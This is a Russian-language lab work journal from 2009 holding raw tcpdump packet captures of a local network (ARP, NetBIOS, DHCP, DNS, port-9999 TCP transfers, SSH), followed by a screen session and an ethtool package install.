Журнал лабораторных работ

Содержание

Журнал

Вторник (06/02/09)

/dev/pts/22
10:33:22
#10:33:23.333479 ARP, Request who-has 10.0.10.223 tell 10.0.10.222, length 46
10:33:23.607176 IP 10.0.40.21.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:23.777068 ARP, Request who-has 10.0.1.5 (Broadcast) tell 10.0.1.5, length 46
10:33:23.779110 ARP, Request who-has 10.0.13.2 (Broadcast) tell 10.0.13.2, length 46
10:33:24
#10:33:24.183339 ARP, Request who-has 10.0.1.1 tell 10.0.40.21, length 46
10:33:24.333108 ARP, Request who-has 10.0.10.223 tell 10.0.10.222, length 46
10:33:24.354713 IP 10.0.40.21.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:24.638802 IP 10.0.20.1.59331 > 255.255.255.255.1211: UDP, length 75
10:33:24.724267 ARP, Request who-has 10.0.51.1 tell 10.0.1.25, length 46
10:33:24.746634 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:33:25.105413 IP 10.0.40.21.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:25.333168 ARP, Request who-has 10.0.10.223 tell 10.0.10.222, length 46
10:33:25.694844 IP 10.0.100.33.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:1b:9e:83:68:5e (oui Unknown), length 300
10:33:25.697299 IP 10.0.1.7.bootps > 255.255.255.255.bootpc: BOOTP/DHCP, Reply, length 300
10:33:25.700909 IP6 fe80::14ea:1c2e:316d:46bf.63586 > ff02::c.3702: UDP, length 1026
10:33:25.752581 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:33:25.758776 IP6 fe80::50ad:2824:ffe6:7bdc.62889 > ff02::c.3702: UDP, length 1026
10:33:25.758881 IP 10.0.35.100.32769 > 10.0.35.1.domain: 64484+[|domain]
10:33:25.759130 IP 10.0.35.1.domain > 10.0.35.100.32769: 64484 NXDomain*[|domain]
10:33:25.772366 IP6 fe80::14ea:1c2e:316d:46bf.63586 > ff02::c.3702: UDP, length 1026
10:33:25.777796 ARP, Request who-has 10.0.1.5 (Broadcast) tell 10.0.1.5, length 46
10:33:25.779005 ARP, Request who-has 10.0.13.2 (Broadcast) tell 10.0.13.2, length 46
10:33:25.815354 IP6 fe80::50ad:2824:ffe6:7bdc.62889 > ff02::c.3702: UDP, length 1026
10:33:26
#10:33:26.858960 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:33:27.059836 IP6 fe80::14ea:1c2e:316d:46bf.546 > ff02::1:2.547: dhcp6 solicit
10:33:27.777838 ARP, Request who-has 10.0.1.5 (Broadcast) tell 10.0.1.5, length 46
10:33:27.778902 ARP, Request who-has 10.0.13.2 (Broadcast) tell 10.0.13.2, length 46
10:33:28.464913 IP 10.0.40.116.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:28.640530 IP 192.168.14.1.netbios-dgm > 192.168.14.255.netbios-dgm: NBT UDP PACKET(138)
10:33:28.640666 IP 10.0.35.100.32769 > 10.0.35.1.domain: 32587+ PTR? 255.14.168.192.in-addr.arpa. (45)
10:33:28.695109 IP 10.0.100.33.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:1b:9e:83:68:5e (oui Unknown), length 300
10:33:28.696326 IP 10.0.1.7.bootps > 255.255.255.255.bootpc: BOOTP/DHCP, Reply, length 300
10:33:28.699911 IP 10.0.35.1.domain > 10.0.35.100.32769: 32587 NXDomain 0/1/0 (122)
10:33:28.706915 IP 10.0.100.33.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
...
        0x0010:  0000 0000 0105 0000 0000 0000 7400 6f00  ............t.o.
        0x0020:  7000 6100 7a00 2e00 7400 6500 6300 6800  p.a.z...t.e.c.h.
        0x0030:  2e00 6900 6e00 6300 0000 0000            ..i.n.c.....
10:33:29.456096 IP 10.0.100.33.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:29.566466 ARP, Request who-has 10.0.14.50 tell 10.0.1.120, length 46
10:33:29.776467 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:33:29.776568 ARP, Request who-has 10.0.1.5 (Broadcast) tell 10.0.1.5, length 46
10:33:29.779933 ARP, Request who-has 10.0.13.2 (Broadcast) tell 10.0.13.2, length 46
10:33:29.944281 IP 10.0.40.116.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:30.003016 ARP, Request who-has 10.0.1.124 tell 10.0.1.120, length 46
10:33:30
#10:33:30.018613 ARP, Request who-has 10.0.1.120 tell 10.0.1.124, length 46
10:33:30.033999 ARP, Request who-has 192.168.14.1 tell 192.168.14.7, length 46
10:33:30.034363 ARP, Request who-has 192.168.14.7 tell 192.168.14.1, length 46
10:33:30.091217 IP 192.168.105.2.36358 > 10.0.35.100.9999: Flags [S], seq 3070528114, win 5840, options [mss 1460,sackOK,TS val 465882 ecr 0,nop,wscale 6], length 0
10:33:30.091235 IP 10.0.35.100.9999 > 192.168.105.2.36358: Flags [S.], seq 2025527372, ack 3070528115, win 5792, options [mss 1460,sackOK,TS val 17402235 ecr 465882,nop,wscale 4], length 0
10:33:30.092233 IP 192.168.105.2.36358 > 10.0.35.100.9999: Flags [.], ack 1, win 92, options [nop,nop,TS val 465882 ecr 17402235], length 0
10:33:30.093362 IP 192.168.105.2.36358 > 10.0.35.100.9999: Flags [P.], seq 1:265, ack 1, win 92, options [nop,nop,TS val 465882 ecr 17402235], length 264
10:33:30.093368 IP 10.0.35.100.9999 > 192.168.105.2.36358: Flags [.], ack 265, win 429, options [nop,nop,TS val 17402235 ecr 465882], length 0
10:33:30.105411 IP 10.0.35.100.38546 > 10.0.35.1.9999: Flags [S], seq 2028139423, win 5840, options [mss 1460,sackOK,TS val 17402239 ecr 0,nop,wscale 4], length 0
10:33:30.105517 IP 10.0.35.1.9999 > 10.0.35.100.38546: Flags [S.], seq 4061438496, ack 2028139424, win 5792, options [mss 1460,sackOK,TS val 410134797 ecr 17402239,nop,wscale 4], length 0
10:33:30.105527 IP 10.0.35.100.38546 > 10.0.35.1.9999: Flags [.], ack 1, win 365, options [nop,nop,TS val 17402239 ecr 410134797], length 0
...
10:33:30.333027 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [S], seq 3077844109, win 5840, options [mss 1460,sackOK,TS val 465942 ecr 0,nop,wscale 6], length 0
10:33:30.333035 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [S.], seq 2027690652, ack 3077844110, win 5792, options [mss 1460,sackOK,TS val 17402296 ecr 465942,nop,wscale 4], length 0
10:33:30.333992 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 1, win 92, options [nop,nop,TS val 465942 ecr 17402296], length 0
10:33:30.334226 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [P.], seq 1:232, ack 1, win 92, options [nop,nop,TS val 465943 ecr 17402296], length 231
10:33:30.334230 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], ack 232, win 429, options [nop,nop,TS val 17402296 ecr 465943], length 0
10:33:30.362069 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [S], seq 2031840393, win 5840, options [mss 1460,sackOK,TS val 17402301 ecr 0,nop,wscale 4], length 0
10:33:30.362153 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [S.], seq 4076464478, ack 2031840394, win 5792, options [mss 1460,sackOK,TS val 410134861 ecr 17402301,nop,wscale 4], length 0
10:33:30.362168 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 1, win 365, options [nop,nop,TS val 17402301 ecr 410134861], length 0
10:33:30.362329 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [P.], seq 1:231, ack 1, win 365, options [nop,nop,TS val 17402301 ecr 410134861], length 230
10:33:30.362416 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], ack 231, win 429, options [nop,nop,TS val 410134861 ecr 17402301], length 0
10:33:30
#10:33:30.630126 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 1:18, ack 231, win 429, options [nop,nop,TS val 410134926 ecr 17402301], length 17
10:33:30.630134 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 18, win 365, options [nop,nop,TS val 17402370 ecr 410134926], length 0
10:33:30.630157 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 18:2914, ack 231, win 429, options [nop,nop,TS val 410134926 ecr 17402301], length 2896
10:33:30.630159 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 2914, win 546, options [nop,nop,TS val 17402370 ecr 410134926], length 0
10:33:30.630217 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 2914:4286, ack 231, win 429, options [nop,nop,TS val 410134926 ecr 17402370], length 1372
10:33:30.630221 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 4286, win 727, options [nop,nop,TS val 17402370 ecr 410134926], length 0
10:33:30.659739 IP 10.0.50.1.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:30.669013 ARP, Request who-has 10.0.50.1 tell 10.0.1.4, length 46
10:33:30.681234 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 4286:7182, ack 231, win 429, options [nop,nop,TS val 410134939 ecr 17402370], length 2896
10:33:30.681237 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 7182, win 908, options [nop,nop,TS val 17402383 ecr 410134939], length 0
10:33:30.681244 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 7182:8382, ack 231, win 429, options [nop,nop,TS val 410134939 ecr 17402370], length 1200
...
10:33:30.756983 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 16572, win 635, options [nop,nop,TS val 466048 ecr 17402401], length 0
10:33:30.803322 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 20670:23566, ack 231, win 429, options [nop,nop,TS val 410134971 ecr 17402401], length 2896
10:33:30.803326 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 23566, win 2356, options [nop,nop,TS val 17402413 ecr 410134971], length 0
10:33:30.803333 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 23566:24766, ack 231, win 429, options [nop,nop,TS val 410134971 ecr 17402401], length 1200
10:33:30.803335 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 24766, win 2537, options [nop,nop,TS val 17402413 ecr 410134971], length 0
10:33:30.803539 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 16572:19468, ack 232, win 429, options [nop,nop,TS val 17402413 ecr 466048], length 2896
10:33:30.803544 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 19468:20668, ack 232, win 429, options [nop,nop,TS val 17402413 ecr 466048], length 1200
10:33:30.804969 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 18020, win 680, options [nop,nop,TS val 466060 ecr 17402413], length 0
10:33:30.804974 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 19468, win 725, options [nop,nop,TS val 466060 ecr 17402413], length 0
10:33:30.804975 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 20668, win 770, options [nop,nop,TS val 466060 ecr 17402413], length 0
10:33:30
#10:33:30.832047 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 24766:27662, ack 231, win 429, options [nop,nop,TS val 410134977 ecr 17402413], length 2896
10:33:30.832053 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 27662, win 2718, options [nop,nop,TS val 17402420 ecr 410134977], length 0
10:33:30.832059 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 27662:28862, ack 231, win 429, options [nop,nop,TS val 410134977 ecr 17402413], length 1200
10:33:30.832062 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 28862, win 2899, options [nop,nop,TS val 17402420 ecr 410134977], length 0
10:33:30.832257 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 20668:23564, ack 232, win 429, options [nop,nop,TS val 17402420 ecr 466060], length 2896
10:33:30.832261 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 23564:24764, ack 232, win 429, options [nop,nop,TS val 17402420 ecr 466060], length 1200
10:33:30.833702 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 22116, win 816, options [nop,nop,TS val 466067 ecr 17402420], length 0
10:33:30.833707 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 23564, win 861, options [nop,nop,TS val 466067 ecr 17402420], length 0
10:33:30.833712 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 24764, win 906, options [nop,nop,TS val 466067 ecr 17402420], length 0
10:33:30.869112 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 28862:31758, ack 231, win 429, options [nop,nop,TS val 410134985 ecr 17402420], length 2896
10:33:30.869115 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 31758, win 3080, options [nop,nop,TS val 17402430 ecr 410134985], length 0
...
10:33:31.051490 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 61630, win 3879, options [nop,nop,TS val 17402475 ecr 410135033], length 0
10:33:31.051656 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 53436:56332, ack 232, win 429, options [nop,nop,TS val 17402475 ecr 466119], length 2896
10:33:31.051660 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 56332:57532, ack 232, win 429, options [nop,nop,TS val 17402475 ecr 466119], length 1200
10:33:31.053122 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 57532, win 1002, options [nop,nop,TS val 466122 ecr 17402475], length 0
10:33:31.098756 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 61630:64526, ack 231, win 429, options [nop,nop,TS val 410135045 ecr 17402475], length 2896
10:33:31.098766 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 64526:65726, ack 231, win 429, options [nop,nop,TS val 410135045 ecr 17402475], length 1200
10:33:31.098771 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 65726, win 3879, options [nop,nop,TS val 17402487 ecr 410135045], length 0
10:33:31.098962 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 57532:60428, ack 232, win 429, options [nop,nop,TS val 17402487 ecr 466122], length 2896
10:33:31.098966 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 60428:61628, ack 232, win 429, options [nop,nop,TS val 17402487 ecr 466122], length 1200
10:33:31.100428 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 61628, win 1002, options [nop,nop,TS val 466134 ecr 17402487], length 0
10:33:31
#10:33:31.107051 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 65726:68622, ack 231, win 429, options [nop,nop,TS val 410135045 ecr 17402487], length 2896
10:33:31.107055 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 68622:69822, ack 231, win 429, options [nop,nop,TS val 410135045 ecr 17402487], length 1200
10:33:31.107058 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 69822, win 3879, options [nop,nop,TS val 17402489 ecr 410135045], length 0
10:33:31.107195 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 61628:64524, ack 232, win 429, options [nop,nop,TS val 17402489 ecr 466134], length 2896
10:33:31.107200 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 64524:65724, ack 232, win 429, options [nop,nop,TS val 17402489 ecr 466134], length 1200
10:33:31.108656 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 65724, win 1002, options [nop,nop,TS val 466136 ecr 17402489], length 0
10:33:31.113953 ARP, Request who-has 10.0.14.50 tell 10.0.1.120, length 46
10:33:31.122141 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 69822:72718, ack 231, win 429, options [nop,nop,TS val 410135049 ecr 17402489], length 2896
10:33:31.122159 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 72718:73918, ack 231, win 429, options [nop,nop,TS val 410135049 ecr 17402489], length 1200
10:33:31.122162 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 73918, win 3879, options [nop,nop,TS val 17402493 ecr 410135049], length 0
10:33:31.122558 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 65724:68620, ack 232, win 429, options [nop,nop,TS val 17402493 ecr 466136], length 2896
...
10:33:31.412879 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 118974, win 3879, options [nop,nop,TS val 17402565 ecr 410135123], length 0
10:33:31.413016 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 110780:113676, ack 232, win 429, options [nop,nop,TS val 17402565 ecr 466202], length 2896
10:33:31.413025 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 113676:114876, ack 232, win 429, options [nop,nop,TS val 17402565 ecr 466202], length 1200
10:33:31.414507 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 114876, win 1002, options [nop,nop,TS val 466213 ecr 17402565], length 0
10:33:31.430407 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 118974:121870, ack 231, win 429, options [nop,nop,TS val 410135128 ecr 17402565], length 2896
10:33:31.430416 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 121870:123070, ack 231, win 429, options [nop,nop,TS val 410135128 ecr 17402565], length 1200
10:33:31.430426 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 123070, win 3879, options [nop,nop,TS val 17402570 ecr 410135128], length 0
10:33:31.430605 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 114876:117772, ack 232, win 429, options [nop,nop,TS val 17402570 ecr 466213], length 2896
10:33:31.430615 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 117772:118972, ack 232, win 429, options [nop,nop,TS val 17402570 ecr 466213], length 1200
10:33:31.432079 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 118972, win 1002, options [nop,nop,TS val 466217 ecr 17402570], length 0
10:33:31
#10:33:31.446512 IP 10.0.40.116.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:31.479246 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 123070:125966, ack 231, win 429, options [nop,nop,TS val 410135140 ecr 17402570], length 2896
10:33:31.479256 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 125966:127166, ack 231, win 429, options [nop,nop,TS val 410135140 ecr 17402570], length 1200
10:33:31.479260 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 127166, win 3879, options [nop,nop,TS val 17402582 ecr 410135140], length 0
10:33:31.479435 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 118972:121868, ack 232, win 429, options [nop,nop,TS val 17402582 ecr 466217], length 2896
10:33:31.479445 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 121868:123068, ack 232, win 429, options [nop,nop,TS val 17402582 ecr 466217], length 1200
10:33:31.480943 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 123068, win 1002, options [nop,nop,TS val 466229 ecr 17402582], length 0
10:33:31.482291 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 127166:130062, ack 231, win 429, options [nop,nop,TS val 410135140 ecr 17402582], length 2896
10:33:31.482333 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 130062:131262, ack 231, win 429, options [nop,nop,TS val 410135140 ecr 17402582], length 1200
10:33:31.482337 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 131262, win 3879, options [nop,nop,TS val 17402582 ecr 410135140], length 0
10:33:31.482482 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 123068:125964, ack 232, win 429, options [nop,nop,TS val 17402582 ecr 466229], length 2896
...
10:33:31.859873 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 196796:199692, ack 232, win 429, options [nop,nop,TS val 17402677 ecr 466316], length 2896
10:33:31.859878 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 199692:200892, ack 232, win 429, options [nop,nop,TS val 17402677 ecr 466316], length 1200
10:33:31.861435 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 200892, win 1002, options [nop,nop,TS val 466324 ecr 17402677], length 0
10:33:31.873134 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 204990:207886, ack 231, win 429, options [nop,nop,TS val 410135238 ecr 17402677], length 2896
10:33:31.873142 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 207886:209086, ack 231, win 429, options [nop,nop,TS val 410135238 ecr 17402677], length 1200
10:33:31.873147 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 209086, win 3879, options [nop,nop,TS val 17402681 ecr 410135238], length 0
10:33:31.873313 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 200892:203788, ack 232, win 429, options [nop,nop,TS val 17402681 ecr 466324], length 2896
10:33:31.873317 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 203788:204988, ack 232, win 429, options [nop,nop,TS val 17402681 ecr 466324], length 1200
10:33:31.874791 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 204988, win 1002, options [nop,nop,TS val 466328 ecr 17402681], length 0
10:33:31.889767 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:33:31
#10:33:31.916456 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 209086:211982, ack 231, win 429, options [nop,nop,TS val 410135248 ecr 17402681], length 2896
10:33:32.477160 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 323774, win 3879, options [nop,nop,TS val 17402832 ecr 410135389], length 0
10:33:32.477349 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 315580:318476, ack 232, win 429, options [nop,nop,TS val 17402832 ecr 466468], length 2896
10:33:32.477356 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 318476:319676, ack 232, win 429, options [nop,nop,TS val 17402832 ecr 466468], length 1200
10:33:32.478814 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 319676, win 1002, options [nop,nop,TS val 466479 ecr 17402832], length 0
10:33:32.522340 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 323774:326670, ack 231, win 429, options [nop,nop,TS val 410135401 ecr 17402832], length 2896
10:33:32.522345 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 326670:327870, ack 231, win 429, options [nop,nop,TS val 410135401 ecr 17402832], length 1200
10:33:32.522349 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 327870, win 3879, options [nop,nop,TS val 17402842 ecr 410135401], length 0
10:33:32.522495 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 319676:322572, ack 232, win 429, options [nop,nop,TS val 17402842 ecr 466479], length 2896
10:33:32.522500 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 322572:323772, ack 232, win 429, options [nop,nop,TS val 17402842 ecr 466479], length 1200
10:33:32.523959 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 323772, win 1002, options [nop,nop,TS val 466490 ecr 17402842], length 0
...
10:33:32.815895 IP 10.0.35.1.9999 > 10.0.35.100.38548: Flags [.], ack 260, win 429, options [nop,nop,TS val 410135474 ecr 17402915], length 0
10:33:33.054109 IP 10.0.35.1.9999 > 10.0.35.100.38548: Flags [P.], seq 1:28, ack 260, win 429, options [nop,nop,TS val 410135533 ecr 17402915], length 27
10:33:33.054114 IP 10.0.35.100.38548 > 10.0.35.1.9999: Flags [.], ack 28, win 365, options [nop,nop,TS val 17402976 ecr 410135533], length 0
10:33:33.054165 IP 10.0.35.1.9999 > 10.0.35.100.38548: Flags [P.], seq 28:123, ack 260, win 429, options [nop,nop,TS val 410135533 ecr 17402976], length 95
10:33:33.054168 IP 10.0.35.100.38548 > 10.0.35.1.9999: Flags [.], ack 123, win 365, options [nop,nop,TS val 17402976 ecr 410135533], length 0
10:33:33.054211 IP 10.0.35.100.38548 > 10.0.35.1.9999: Flags [F.], seq 260, ack 123, win 365, options [nop,nop,TS val 17402976 ecr 410135533], length 0
10:33:33.054304 IP 10.0.35.1.9999 > 10.0.35.100.38548: Flags [F.], seq 123, ack 261, win 429, options [nop,nop,TS val 410135533 ecr 17402976], length 0
10:33:33.054308 IP 10.0.35.100.38548 > 10.0.35.1.9999: Flags [.], ack 124, win 365, options [nop,nop,TS val 17402976 ecr 410135533], length 0
10:33:33.054979 IP 10.0.35.100.9999 > 192.168.105.2.36360: Flags [P.], seq 1:28, ack 261, win 429, options [nop,nop,TS val 17402976 ecr 466560], length 27
10:33:33.056227 IP 192.168.105.2.36360 > 10.0.35.100.9999: Flags [.], ack 28, win 92, options [nop,nop,TS val 466623 ecr 17402976], length 0
10:33:44
#10:33:44.334563 ARP, Request who-has 10.0.10.223 tell 10.0.10.222, length 46
10:33:44.524992 IP 10.0.12.1 > 239.255.255.250: igmp v2 report 239.255.255.250
10:33:44.642358 IP 10.0.20.1.59331 > 255.255.255.255.1211: UDP, length 75
10:33:44.865679 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:33:44.945768 IP 10.0.1.7.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:44.988607 IP 10.0.40.116.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:44
#10:33:45.334624 ARP, Request who-has 10.0.10.223 tell 10.0.10.222, length 46
10:33:45.695833 IP 10.0.1.7.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:45
#10:33:45.777125 ARP, Request who-has 10.0.1.5 (Broadcast) tell 10.0.1.5, length 46
10:34:19.775683 ARP, Request who-has 10.0.1.5 (Broadcast) tell 10.0.1.5, length 46
10:34:19.776411 ARP, Request who-has 10.0.13.2 (Broadcast) tell 10.0.13.2, length 46
10:34:19.833206 IP 10.0.40.116.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:34:20.029021 ARP, Request who-has 192.168.14.10 tell 192.168.14.1, length 46
10:34:20.051326 IP 10.0.47.1.1165 > 255.255.255.255.1211: UDP, length 75
10:34:20.175602 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:34:20.189082 IP 10.0.1.2.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:34:20.294792 ARP, Request who-has 10.0.19.1 tell 10.0.1.25, length 46
10:34:20.302125 IP 10.0.1.3.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:34:20.583556 IP 10.0.40.116.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
...
10:34:33.076055 IP 10.0.35.100.ssh > linux13.unix.nt.54565: Flags [P.], seq 2860:2908, ack 2468, win 956, options [nop,nop,TS val 17417980 ecr 4294908186], length 48
10:34:33.076226 IP linux13.unix.nt.54565 > 10.0.35.100.ssh: Flags [.], ack 2908, win 214, options [nop,nop,TS val 4294908186 ecr 17417980], length 0
10:34:33.338640 ARP, Request who-has 10.0.10.223 tell 10.0.10.222, length 46
10:34:33.353248 IP linux13.unix.nt.54565 > 10.0.35.100.ssh: Flags [P.], seq 2468:2516, ack 2908, win 214, options [nop,nop,TS val 4294908255 ecr 17417980], length 48
10:34:33.353454 IP 10.0.35.100.ssh > linux13.unix.nt.54565: Flags [P.], seq 2908:2956, ack 2516, win 956, options [nop,nop,TS val 17418050 ecr 4294908255], length 48
10:34:33.353706 IP linux13.unix.nt.54565 > 10.0.35.100.ssh: Flags [.], ack 2956, win 214, options [nop,nop,TS val 4294908256 ecr 17418050], length 0
10:34:33.437021 IP linux13.unix.nt.54565 > 10.0.35.100.ssh: Flags [P.], seq 2516:2564, ack 2956, win 214, options [nop,nop,TS val 4294908276 ecr 17418050], length 48
10:34:33.437243 IP 10.0.35.100.ssh > linux13.unix.nt.54565: Flags [P.], seq 2956:3004, ack 2564, win 956, options [nop,nop,TS val 17418071 ecr 4294908276], length 48
10:34:33.437434 IP linux13.unix.nt.54565 > 10.0.35.100.ssh: Flags [.], ack 3004, win 214, options [nop,nop,TS val 4294908276 ecr 17418071], length 0
10:34:33.531129 ARP, Request who-has 192.168.14.253 tell 192.168.14.1, length 46
/dev/pts/10
10:34:30
#screen -x
/dev/pts/24
10:35:14
#apt-get install ethtool
Чтение списков пакетов... Готово
Построение дерева зависимостей
Чтение информации о состоянии... Готово
Уже установлена самая новая версия ethtool.
